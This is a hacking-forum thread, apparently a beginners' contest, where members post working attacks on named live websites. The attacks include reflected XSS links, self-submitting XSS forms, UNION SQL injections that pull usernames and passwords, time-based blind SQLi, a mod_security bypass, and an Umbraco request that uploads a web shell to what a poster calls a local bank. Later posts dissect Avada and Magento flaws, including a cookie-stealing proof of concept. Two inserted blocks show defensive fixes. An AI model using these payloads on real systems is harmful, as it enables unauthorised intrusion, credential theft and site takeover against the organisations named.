Vulnerability contest for beginners

Discussion in 'Sandbox' started by yarbabin, 1 Jun 2015.

  1. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    19
    Reputations:
    1
    Site: https://www.silhouettedesignstore.com/
    Vulnerability: Reflected XSS (it loops (watch the page); it works without '"--> as well, but this way is more interesting))))
    Code:
    https://www.silhouettedesignstore.com/designs?search='"--><scRipt>alert(123)</scRipt>

    Same site: Frame Injection
    Code:
    https://www.silhouettedesignstore.com/designs?search=<iframe src="http://www.Bla-Bla-Bla.com/"></iframe>
    Site: http://getbitco.com/
    Vulnerability: Reflected XSS
    Code:
    http://getbitco.com/?ans=Error<ScRiPt>alert(123456789)</ScRiPt>


    Site: http://bitganancias.com/
    Vulnerability: XSS
    Code:
        <form style="display:none" action="http://bitganancias.com/faucet/?r=Your_Address" method="POST">
            <input name="address" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(0x000DDC)&lt;/scRipt&gt;"/> 
            <input name="adcopy_response" value="manual_challenge"/> 
            <input name="adcopy_challenge" value=""/> 
        </form>
        <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
    
     
  2. ubepkr

    ubepkr Member

    Joined:
    17 Aug 2015
    Messages:
    96
    Likes Received:
    19
    Reputations:
    1
    Site: http://www.academyplazahotel.ie/
    Vulnerability: Reflected XSS
    Code:
    http://www.academyplazahotel.ie/booknow.php?bg=FFFFFF&color='"--><scRipt>alert(1234567890)</scRipt>
    Site: http://www.cleanrooms-ireland.ie
    Vulnerability: Reflected XSS
    Code:
    http://www.cleanrooms-ireland.ie/w/link.cfm?w_y=4&w_u='"--></scRipt><scRipt>alert(1234567890)</scRipt>
    Same site: (open redirect?)
    Code:
    http://www.cleanrooms-ireland.ie/w/llink.cfm?w_y=4&w_u=http://google.com
    Site: http://forums.somethingawful.com
    Vulnerability: Reflected XSS
    Code:
    http://forums.somethingawful.com/account.php?action=loginform&next=/member.php"()%26%25<acx><ScRiPt%20>alert(1234567890)</ScRiPt>
    Site: http://www.zoommoola.com
    Vulnerability: Reflected XSS
    Code:
    http://www.zoommoola.com/?ref='"--><scRipt>alert(1234567890)</scRipt> 
    Site: http://www.usatestprep.com
    Vulnerability: Reflected XSS
    Code:
    http://www.usatestprep.com/modules/map/_brains/map_product.php?id=&page=landing'"()&%<acx><ScRiPt >alert(123456)</ScRiPt>
    Site: http://txbra.org
    Vulnerability: XSS
    Code:
      <form style="display:none" action="http://txbra.org/results13/index.asp?page=race" method="POST">
            <input name="submit" value="Go"/>
            <input name="cbo" value="&#39;&quot;--&gt;&lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1234567890)&lt;/scRipt&gt;"/>
        </form>
        <script> HTMLFormElement.prototype.submit.call(document.forms[0]);</script>
     
  3. Jup1ter_

    Jup1ter_ New Member

    Joined:
    27 Nov 2015
    Messages:
    19
    Likes Received:
    4
    Reputations:
    6
  4. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    884
    Reputations:
    363
    Still relevant, no time to sort through it all yet. I'll add it for everyone later.
     
  5. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Remote Code Execution
    Site: ecb.md
    Exploit:
    Code:
    POST /umbraco/webservices/codeEditorSave.asmx HTTP/1.1
    SOAPAction: "http://tempuri.org/SaveDLRScript"
    Content-Type: text/xml
    Host: ecb.md
    Content-Length: 710
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
    Accept: */*
    
    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
            <SaveDLRScript xmlns="http://tempuri.org/">
                <fileName>/..\\..\\..\\umbraco\\shell.aspx</fileName>
                <oldName>string</oldName>
                <fileContents>
    
    The .aspx shell code goes here; in Burp Suite choose
    Convert selection -> HTML -> HTML encode key characters,
    that is how it got past the filtering
    
    </fileContents>
                <ignoreDebugging>1</ignoreDebugging>
            </SaveDLRScript>
        </soap:Body>
    </soap:Envelope>
    It gets uploaded here: ecb.md/umbraco/shell.aspx
     
    Gorev, lisvan, grimnir and 2 others like this.
  6. chatanti

    chatanti Member

    Joined:
    13 Jul 2011
    Messages:
    30
    Likes Received:
    14
    Reputations:
    0
    Went to ecb.md, got scared, left )
     
  7. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Local bank )
     
  8. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    784
    Likes Received:
    912
    Reputations:
    58
    You've already done everything

    PHP:
    http://www.cobranet.org/about.php?id=1+union+select+1,database(),3,user(),5,6+--+-
     
    Filipp and AAI like this.
  9. AAI

    AAI Member

    Joined:
    27 Dec 2015
    Messages:
    16
    Likes Received:
    7
    Reputations:
    1
    BabaDook likes this.
  10. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    116
    Likes Received:
    9
    Reputations:
    6
  11. AAI

    AAI Member

    Joined:
    27 Dec 2015
    Messages:
    16
    Likes Received:
    7
    Reputations:
    1
  12. nordwarrior

    nordwarrior New Member

    Joined:
    12 Dec 2015
    Messages:
    13
    Likes Received:
    2
    Reputations:
    2
    SQLi, mod_security bypass
    Code:
    http://thewallis.org/showinfo.php?id=-1+/*!50000UNION+select+null,concat_ws%280x3a,TABLE_NAME,%20COLUMN_NAME%29+/**/FROM+/**/INFORMATION_SCHEMA.COLUMNS/**/+LIMIT+0,800*/
    
     
    Zen1T21 likes this.
  13. lastbyte

    lastbyte New Member

    Joined:
    11 Feb 2016
    Messages:
    2
    Likes Received:
    0
    Reputations:
    1
  14. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,681
    Likes Received:
    884
    Reputations:
    363
    Minor problems with the hosting and the rating, restoring it for now
     
  15. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Site: http://www.bri.gov.md/panel/login.php
    Vulnerability: cancelling the redirect
    Exploit:

    Site: http://www.stroika.md/
    Vulnerability: SQL injection
    Exploit:
    Code:
    http://www.stroika.md/detail.php?id=1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+
    Site: http://www.calidus.ro/
    Vulnerability: SQL injection
    Exploit:
    Code:
    http://www.calidus.ro/en/news.php?id=-1+UNION+SELECT+1%2Cusername%2C3%2Cuser_password+FROM+users
    Site: http://lukoil.md/ro/search_result
    Vulnerability: SQL injection (POST SQL injection in the search)
    Exploit:
    Code:
    -1' UNION SELECT 1,2,user(),4,5,6 -- 
    Site: http://mobile.airmoldova.md/
    Vulnerability: SQL injection
    Exploit:
    Code:
    http://mobile.airmoldova.md/special-offers-ru/?item=-9179)+UNION+SELECT+1,2,3,4,5,user_login,7,8,9,10,11,12,13,user_password,15,16,17,18,19,20,21,22,23,24,25+FROM+users+--+
    Site: http://www.infocom.md/
    Vulnerability: SQL injection
    Exploit:
    Code:
    http://www.infocom.md/evenimente.php?id=13+UNION+SELECT+1,2,user(),version()+--+
    Site: http://investigatii.md/
    Vulnerability: SQL injection
    Exploit:
    Code:
    http://investigatii.md/eng/comments.php?id=258+union+select+1,2,version(),user(),5,6,7,8,9,database(),11,12,13,14
     
    #116 Octavian, 19 Feb 2016
    Last edited: 19 Feb 2016
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    784
    Likes Received:
    912
    Reputations:
    58
    Blind SQL injection
    PHP:
    http://parfume.in.ua/parfumes.php?Gabanna&designer=DG&designers=Dolce&sort=1+and+sleep(12)+--+-
    HTML injection
    PHP:
    http://shops.ixi.ua/goods.php?goods=<h2>hello<br>mir</
    And one more time-based SQL injection
    PHP:
    http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+sleep(123)&val=11_266 
    And also logical true-or-false
    PHP:
    http://www.bdsm.com.ua/shop/index.php?bdsm=cat&sort=1+and+1=1&val=11_266
     
    #117 BabaDook, 6 Mar 2016
    Last edited: 6 Mar 2016
  17. blacKK

    blacKK New Member

    Joined:
    13 Mar 2016
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
     
  18. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    317
    Likes Received:
    476
    Reputations:
    146
    Theme for WordPress

    Avada #1 Selling Theme of All Time
    (190,000+ Satisfied Customers)
    inurl:"product_orderby" (Results: about 8,840,000 (0.63 sec.))


    ./includes/woo-config.php

    PHP:
    if ( isset( $_SERVER['QUERY_STRING'] ) ) {
        // every key of the raw query string is copied into $params
        parse_str( $_SERVER['QUERY_STRING'], $params );
    }

    $order = ! empty( $params['product_order'] ) ? $params['product_order'] : 'desc';

    $order = strtoupper( $order );

    // $order reaches ORDER BY without any whitelist check
    $args['orderby'] = "sum_of_comments_approved DESC, average_rating {$order}, $wpdb->posts.post_date DESC";

    The result is a Time-Based Blind SQL Injection:


    I didn't go into the details; it seems to sleep like this: number of sorted products * sleep(). Affected versions are most likely <= 4, including the latest. I haven't checked precisely.
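The whitelist that the woo-config.php snippet above is missing, written as an added example (this is not Avada's code): the direction taken from product_order is reduced to ASC or DESC before it is interpolated into the orderby string. The function names and the wp_posts table name are assumptions.

```php
<?php
// Added example, not Avada's code: the same orderby construction, but the
// user-supplied direction is reduced to a whitelist before it reaches SQL.

function avada_safe_order_direction(array $params): string
{
    // Arrays (product_order[]=x) and missing values fall back to the default.
    $raw = isset($params['product_order']) && is_string($params['product_order'])
        ? $params['product_order']
        : 'desc';
    $dir = strtoupper($raw);
    // Only the two legal directions are ever interpolated; anything else
    // (for example "desc, sleep(5)") is replaced by DESC.
    return in_array($dir, array('ASC', 'DESC'), true) ? $dir : 'DESC';
}

function avada_safe_orderby_clause(array $params, string $postsTable): string
{
    $order = avada_safe_order_direction($params);
    return "sum_of_comments_approved DESC, average_rating {$order}, {$postsTable}.post_date DESC";
}

// Constructed query strings: a legal value and an injection attempt of the
// kind described in the post; the second one is neutralised to DESC.
foreach (array('product_order=asc', 'product_order=desc, sleep(5)') as $qs) {
    parse_str($qs, $params);
    echo avada_safe_orderby_clause($params, 'wp_posts'), PHP_EOL;
}
```

WordPress also ships sanitize_sql_orderby() for the same purpose; the point is that the direction is validated, never passed through.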
     
  19. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    317
    Likes Received:
    476
    Reputations:
    146

    Magento Downloader - 1.x

    Reflected XSS



    HTML:
    <html>
       <body onload="document.forms.hidden.submit();">
         <form id="hidden" method="POST" action="http://host/downloader.php?action=checkdb">
           <input name="host" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
           <input name="username" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
           <input name="password" type="hidden" value="&quot;><img src=x onerror=alert(document.cookie)><x x=&quot;">
         </form>
       </body>
    </html>
    
    

    ./downloader.php:

    PHP:
      public function validateAction()
      {
    ...
          // the three POST values are stored verbatim in the session
          if (isset($_GET['action']) && $_GET['action'] == 'checkdb') {
              $this->_session['host'] = $this->_helper->getPost('host');
              $this->_session['username'] = $this->_helper->getPost('username');
              $this->_session['database'] = $this->_helper->getPost('database');
    ...

      public function getPost($key = null, $default = null)
      {
          if (is_null($key)) {
              return $_POST;
          }
          if (isset($_POST[$key])) {
              return $_POST[$key];
          }
          return $default;
      }
    ...

          $this->_helper->printHtmlValidateBlock($this->_session);

    ...

      public function printHtmlValidateBlock($session)
      {
          $host     = isset($session['host']) ? $session['host'] : 'localhost';
          $username = isset($session['username']) ? $session['username'] : '';
          $password = !empty($session['password']) ? '******' : '';
          // $host and $username are interpolated into value="..." below without escaping
          echo <<<HTML
      <div class="connection">
      <fieldset class="fieldset">
      <legend>Database Connection</legend>
      <div class="legend">Database Connection</div>
      <div class="input-box">
      <label for="host">Host </label><br />
      <input value="{$host}" type="text" name="host" id="host" class="input-text" />
      </div>
      <div class="input-box">
      <label for="username">User Name </label><br />
      <input value="{$username}" type="text" name="username" id="username" class="input-text" />
      </div>
      <div class="input-box">
      <label for="password">User Password </label><br />
      <input value="{$password}" type="password" name="password" id="password" class="input-text" />
      </div>
    HTML;
          echo $this->printHtmlButtonSet(array('checkdb'=>'Check for InnoDB support'));
          echo <<<HTML
      </fieldset>
      </div>
    HTML;
      }

    FPD

    ./downloader.php:

    PHP:
      protected function _setConnection($host = 'localhost', $username = '', $password = '')
      {
          try {
              $dsn = 'mysql:host=' . $host . ';';
              $this->_connection = new PDO($dsn, $username, $password);
          } catch (PDOException $e) {
              // the user-supplied host and username are echoed back in the error text
              $this->addError('Access denied for user ' . $username . '@' . $host);
          }
          return $this;
      }
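An added example, not Magento's code, of the printHtmlValidateBlock() logic from the post with the session values HTML-escaped before they are interpolated into the heredoc; the function names are assumptions and only the three input boxes are reproduced.

```php
<?php
// Added example, not Magento's code: the same form block, but every
// session value is escaped for the attribute context it is written into.

function escapeAttr($value): string
{
    // ENT_QUOTES turns both " and ' into entities, so a value cannot close
    // the surrounding value="..." attribute and start a new tag.
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function printHtmlValidateBlockSafe(array $session): string
{
    $host     = escapeAttr(isset($session['host']) ? $session['host'] : 'localhost');
    $username = escapeAttr(isset($session['username']) ? $session['username'] : '');
    // the password is never echoed, only a placeholder, as in the original
    $password = !empty($session['password']) ? '******' : '';
    return <<<HTML
    <div class="input-box">
      <label for="host">Host </label><br />
      <input value="{$host}" type="text" name="host" id="host" class="input-text" />
    </div>
    <div class="input-box">
      <label for="username">User Name </label><br />
      <input value="{$username}" type="text" name="username" id="username" class="input-text" />
    </div>
    <div class="input-box">
      <label for="password">User Password </label><br />
      <input value="{$password}" type="password" name="password" id="password" class="input-text" />
    </div>
HTML;
}

// Constructed input of the shape the PoC form above submits; in the output
// it stays inside the attribute as &quot;&gt;&lt;img ...&gt; instead of a live tag.
$session = array(
    'host'     => '"><img src=x onerror=alert(document.cookie)><x x="',
    'username' => 'magento',
    'password' => 'secret',
);
echo printHtmlValidateBlockSafe($session);
```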

     